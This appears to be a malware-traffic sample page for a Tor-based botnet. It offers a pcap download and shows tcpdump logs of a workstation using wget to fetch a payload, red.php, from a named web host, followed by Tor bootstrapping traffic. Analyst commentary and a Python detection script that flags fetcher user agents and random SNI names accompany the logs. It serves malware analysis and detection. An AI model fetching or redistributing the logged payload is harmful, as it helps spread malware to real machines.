Tor malware botnet red.php: PCAP file download and traffic sample

Download Attachments

  • 1 pcap torbotnet
    torbotnet
    Date added: January 26, 2018 5:50 am
    Added by: admin
    File size: 755 KB
    Downloads: 132
Scan result for the downloaded payload (red.php): 10 engines detected this file
SHA-256 9b606e8e8e7ada9da2afdd3cea20d777f84da9f8b148a58385890e44743f733d
File name red.php
File size 488 KB
Last analysis 2018-01-25 22:27:42 UTC

2018-01-25 22:23:49.279103 IP 192.168.1.102.52977 > 62.149.140.171.80: Flags [P.], seq 0:154, ack 1, win 256, length 154: HTTP: GET /agenti/red.php HTTP/1.1
GET /agenti/red.php HTTP/1.1
User-Agent: Wget/1.19.4 (mingw32)
Accept: */*
Accept-Encoding: identity
Host: www.gefrost.com
Connection: Keep-Alive

Payload fetch: a Windows build of wget (mingw32) retrieves /agenti/red.php from www.gefrost.com (62.149.140.171) over plaintext HTTP. The 154-byte request is exactly the six header lines above with CRLF line endings and the empty terminating line. A command-line fetcher user agent on a workstation, pulling a .php URL from a host the user never browsed, is the first thing to alert on in this capture.

2018-01-25 22:26:51.138603 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 0:245, ack 1, win 256, length 245
[TLS ClientHello, 245 bytes; the server_name extension carries www.yyag3ou3uyxj6ywhd47kon5ot.com]
2018-01-25 22:26:51.267376 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 245:379, ack 1022, win 252, length 134
2018-01-25 22:26:51.384411 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 379:453, ack 1081, win 252, length 74
2018-01-25 22:26:51.501192 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [.], ack 3203, win 256, length 0
2018-01-25 22:26:51.502723 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 453:1039, ack 3203, win 256, length 586
2018-01-25 22:26:51.666011 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 1039:1625, ack 3203, win 256, length 586
2018-01-25 22:26:51.791615 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 1625:2211, ack 3789, win 254, length 586
[encrypted TLS records; the printable-byte dump of these packets contains no readable strings]

First Tor-style session, three minutes after the download. The ClientHello's SNI is a random lowercase label under www.*.com, the fake hostname a Tor client sends in place of a real server name, and the 134-byte record that follows is consistent with the client's second handshake flight (key exchange, ChangeCipherSpec, Finished). Everything after that is ciphertext; the only structure left to an observer is the uniform 586-byte client records.

2018-01-25 22:26:54.392040 IP 192.168.1.102.53021 > 178.62.242.202.443: Flags [P.], seq 376:450, ack 800, win 253, length 74
2018-01-25 22:26:54.392243 IP 192.168.1.102.52991 > 80.131.252.113.9001: Flags [P.], seq 363:437, ack 1061, win 255, length 74
2018-01-25 22:26:54.396617 IP 192.168.1.102.52992 > 163.172.160.227.4443: Flags [P.], seq 373:447, ack 810, win 253, length 74
2018-01-25 22:26:54.398013 IP 192.168.1.102.53001 > 85.25.44.141.443: Flags [P.], seq 359:433, ack 1070, win 256, length 74
2018-01-25 22:26:54.401420 IP 192.168.1.102.53008 > 50.7.151.47.443: Flags [P.], seq 375:449, ack 1073, win 256, length 74
2018-01-25 22:26:54.406334 IP 192.168.1.102.53023 > 52.60.215.15.9001: Flags [.], ack 2219717773, win 256, length 0
2018-01-25 22:26:54.407021 IP 192.168.1.102.53023 > 52.60.215.15.9001: Flags [P.], seq 0:242, ack 1, win 256, length 242
[TLS ClientHello, 242 bytes; the server_name extension carries www.ynygqwwqqmfl2rebqcgqwb.com]
2018-01-25 22:26:54.408539 IP 192.168.1.102.53009 > 136.243.243.6.1444: Flags [P.], seq 367:441, ack 1062, win 252, length 74
2018-01-25 22:26:54.416602 IP 192.168.1.102.52999 > 212.83.154.33.443: Flags [P.], seq 367:441, ack 1063, win 252, length 74
2018-01-25 22:26:54.418368 IP 192.168.1.102.53015 > 130.255.190.187.14400: Flags [P.], seq 370:444, ack 801, win 253, length 74
2018-01-25 22:26:54.422033 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 5009, win 256, length 0
2018-01-25 22:26:54.422405 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 9389, win 256, length 0
2018-01-25 22:26:54.422623 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 12309, win 256, length 0
2018-01-25 22:26:54.422804 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 13769, win 256, length 0
2018-01-25 22:26:54.423367 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 16689, win 256, length 0
2018-01-25 22:26:54.440414 IP 192.168.1.102.52997 > 185.86.151.168.443: Flags [P.], seq 241:375, ack 999, win 252, length 134
[encrypted TLS records on each session above; the printable-byte dumps contain no readable strings]

Within 50 ms the host is mid-session with eleven different servers on ports 443, 9001, 9005, 4443, 1444 and 14400 (9001 is Tor's default ORPort; the rest are typical of relays, not of web servers). A fresh ClientHello to 52.60.215.15:9001 carries another random www.*.com name, and 128.31.0.39:9005 is pushing a bulk download to the client, which acknowledges 16,689 bytes in about 1.3 ms. This fan-out is the Tor client bootstrapping, and it is the behaviour worth alerting on: one workstation holding a dozen concurrent TLS sessions to unrelated hosts on assorted non-standard ports, each of them started within the same second.
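The three things an analyst would pull out of this capture, the plaintext fetch by a command-line tool, the random www.*.com SNI names, and the burst of sessions to unrelated hosts, can be checked mechanically against tcpdump -A text. The script below is an added example, not code from the page or from whoever shared the sample; its input is a constructed excerpt of the summary lines and SNI-bearing dump lines shown above (with the HTTP headers trimmed), and the thresholds (label length, digit requirement, 3 bits/char entropy, 1-second burst window, the list of fetcher user agents) are this script's own heuristics, not a published signature.

```python
"""Triage of tcpdump -A text: a plaintext fetch by a command-line tool, Tor-style
random SNI names in TLS ClientHellos, and the burst of sessions that follows.
Added example; the thresholds are this script's own, not a published signature."""
import math
import re
from datetime import datetime

# Constructed excerpt of the capture on the page (summary lines, then the
# printable bytes of each payload as tcpdump -A prints them; headers trimmed).
SAMPLE = """\
2018-01-25 22:23:49.279103 IP 192.168.1.102.52977 > 62.149.140.171.80: Flags [P.], seq 0:154, ack 1, win 256, length 154: HTTP: GET /agenti/red.php HTTP/1.1
GET /agenti/red.php HTTP/1.1
User-Agent: Wget/1.19.4 (mingw32)
Host: www.gefrost.com
2018-01-25 22:26:51.138603 IP 192.168.1.102.52990 > 194.109.206.212.443: Flags [P.], seq 0:245, ack 1, win 256, length 245
.....{...&.$..!www.yyag3ou3uyxj6ywhd47kon5ot.com.........
2018-01-25 22:26:54.392040 IP 192.168.1.102.53021 > 178.62.242.202.443: Flags [P.], seq 376:450, ack 800, win 253, length 74
2018-01-25 22:26:54.392243 IP 192.168.1.102.52991 > 80.131.252.113.9001: Flags [P.], seq 363:437, ack 1061, win 255, length 74
2018-01-25 22:26:54.396617 IP 192.168.1.102.52992 > 163.172.160.227.4443: Flags [P.], seq 373:447, ack 810, win 253, length 74
2018-01-25 22:26:54.407021 IP 192.168.1.102.53023 > 52.60.215.15.9001: Flags [P.], seq 0:242, ack 1, win 256, length 242
.....x...#.!...www.ynygqwwqqmfl2rebqcgqwb.com.........
2018-01-25 22:26:54.408539 IP 192.168.1.102.53009 > 136.243.243.6.1444: Flags [P.], seq 367:441, ack 1062, win 252, length 74
2018-01-25 22:26:54.418368 IP 192.168.1.102.53015 > 130.255.190.187.14400: Flags [P.], seq 370:444, ack 801, win 253, length 74
2018-01-25 22:26:54.422033 IP 192.168.1.102.53010 > 128.31.0.39.9005: Flags [.], ack 5009, win 256, length 0
"""

SUMMARY_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d{6}) IP "
    r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): "
    r".*?length (?P<length>\d+)")
HTTP_RE = re.compile(r"^(GET|POST) (\S+) HTTP/1\.[01]$")
SNI_RE = re.compile(r"www\.([a-z2-7]{4,25})\.com")  # shape of Tor's fake SNI (assumed)
FETCHER_UAS = {"Wget", "curl", "python-requests"}   # non-browser fetchers (assumed list)


def parse_tcpdump(text):
    """One dict per packet; lines that are not summaries are the previous packet's payload."""
    packets = []
    for line in text.splitlines():
        m = SUMMARY_RE.match(line)
        if m:
            packets.append({"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S.%f"),
                            "dst": m["dst"], "dport": int(m["dport"]),
                            "length": int(m["length"]), "payload": []})
        elif packets:
            packets[-1]["payload"].append(line)
    return packets


def find_plaintext_downloads(packets):
    """(host, path, user_agent) for each plaintext HTTP request sent by a fetcher tool."""
    hits = []
    for p in packets:
        request, headers = None, {}
        for line in p["payload"]:
            m = HTTP_RE.match(line)
            if m:
                request = m.group(2)
            elif ": " in line:
                k, v = line.split(": ", 1)
                headers[k.lower()] = v
        ua = headers.get("user-agent", "")
        if request and ua.split("/")[0] in FETCHER_UAS:
            hits.append((headers.get("host", p["dst"]), request, ua))
    return hits


def shannon_entropy(s):
    """Bits per character; random base32 labels score well above dictionary words."""
    return -sum(s.count(c) / len(s) * math.log2(s.count(c) / len(s)) for c in set(s))


def find_tor_like_sni(packets):
    """(dst, dport, hostname) for ClientHellos whose SNI looks like Tor's random
    www.<label>.com: base32 label of 8+ chars with a digit and >= 3 bits/char.
    Long digit-free labels (rare for base32) are missed; that is the trade-off."""
    hits = []
    for p in packets:
        if p["dport"] == 80:   # a plaintext Host header is not an SNI
            continue
        for line in p["payload"]:
            for label in SNI_RE.findall(line):
                if (len(label) >= 8 and any(c.isdigit() for c in label)
                        and shannon_entropy(label) >= 3.0):
                    hits.append((p["dst"], p["dport"], f"www.{label}.com"))
    return hits


def connection_fanout(packets, window_s=1.0):
    """Group (dst, dport) pairs by first-seen time into bursts; many unrelated
    hosts on assorted ports inside one window is overlay bootstrapping, not browsing."""
    first_seen = {}
    for p in sorted(packets, key=lambda pkt: pkt["ts"]):
        first_seen.setdefault((p["dst"], p["dport"]), p["ts"])
    bursts, current, start = [], [], None
    for dest, ts in sorted(first_seen.items(), key=lambda kv: kv[1]):
        if start is None or (ts - start).total_seconds() > window_s:
            if current:
                bursts.append(current)
            current, start = [], ts
        current.append(dest)
    if current:
        bursts.append(current)
    return bursts


def triage(text):
    packets = parse_tcpdump(text)
    return {"plaintext_downloads": find_plaintext_downloads(packets),
            "tor_like_sni": find_tor_like_sni(packets),
            "largest_burst": max(connection_fanout(packets), key=len)}
```

Run `triage(SAMPLE)` (or `triage(open("capture.txt").read())` on `tcpdump -A -nn -r torbotnet.pcap` output) and it reports the wget fetch of /agenti/red.php from www.gefrost.com, the two random SNI names with the relay each went to, and a burst of seven distinct destinations on six different ports inside the same second. The entropy gate is deliberately coarse: it exists to keep ordinary www.brand.com names out, and on real traffic you would pair it with the fan-out count and the port set rather than alert on the SNI alone.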
